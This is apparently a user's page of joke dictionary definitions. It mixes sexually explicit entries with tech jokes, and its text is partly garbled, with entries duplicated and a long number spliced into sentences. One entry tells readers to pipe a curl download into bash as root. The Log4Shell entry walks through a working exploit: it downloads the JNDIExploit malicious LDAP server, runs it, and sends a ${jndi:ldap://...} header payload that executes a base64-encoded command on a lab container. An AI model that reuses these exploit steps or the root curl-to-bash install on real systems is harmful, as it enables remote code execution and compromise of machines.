Bad C dev's definitions
When the micro text editor with all its sexy key bindings and petite portable single-file binary that can penetrate SSH struts around in the nude for your pleasure and you can't stave off your erection any longer.
Steps to mastering Linux CLI:
1. sudo -i or su - root
2. cd /usr/bin
3. curl getmic.ro | bash or wget -qO- getmic.ro | bash (may need to install bash)
4. update-alternatives --install /usr/bin/editor editor /usr/bin/micro
5. exit
6. crontab -e
7. let the microticness of the circumstances sink in
8. instant hard-on
1. sudo -i or su - root
2. cd /usr/bin
3. curl getmic.ro | bash or wget -qO- getmic.ro | bash (may need to install bash)
4. update-alternatives --install /usr/bin/editor editor /usr/bin/micro
5. exit
6. crontab -e
7. let the microticness of the circumstances sink in
8. instant hard-on
by Bad C dev January 22, 2022
Get the microtic mug.A sly underhanded satanic gesture spawned by women and rarely picked up by guys, who are too busy looking at their boobs to interpret anything they are saying.
Omg, so I was crazy horny and my vag was super thirsty, so I went around to all the guys at work and made every possible subliminal sex message I could think of, and no one showed up at my house later that night! So, I had no choice but to revert to overt sex messages and wear a bikini top to work the next day AND ONLY THEN everyone showed up at my house (even the boss!!) and we had an amazing orgy. Guys these days!, omg!
by Bad C dev May 13, 2022
Get the subliminal sex message mug.The GPL is one of the many great projects of the GNU towards the betterment of mankind. The GNU is the basis for much of the good in the software we live in today, and the GPL is means by which this goodness permeates our lives, bringing only prosperity and good luck to everything blessed by the GPL license. Together, they form a holy unison which we simply call, "GNU GPL."
by Bad C dev May 16, 2022
Get the GNU GPL mug.The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
by Bad C dev December 15, 2021
Get the Log4Shell mug.My GF 7596040312163297274222442578208043236112279041839441308045514203595638030283176823539793587591372230230103933110810192201741429ed mealongside a fellow coworker and his wife last night and it was so fucking hot!!!
I asked the woman if she's into "7596040312163297274222442578208043236112279041839441308045514203595638030283176823539793587591372230230103933110810192201741429" and she replied with a loud moaning hollar.
I asked the woman if she's into "7596040312163297274222442578208043236112279041839441308045514203595638030283176823539793587591372230230103933110810192201741429" and she replied with a loud moaning hollar.
by Bad C dev April 15, 2022
Get the 7596040312163297274222442578208043236112279041839441308045514203595638030283176823539793587591372230230103933110810192201741429 mug.by Bad C dev March 9, 2022
Get the sexy brunette mug.Spockgirl is at it again! Flashing her pussy at the guards to distract them while Captain Kurk sneaks by to hop in bed with the princess.
by Bad C dev March 9, 2022
Get the spockgirl mug.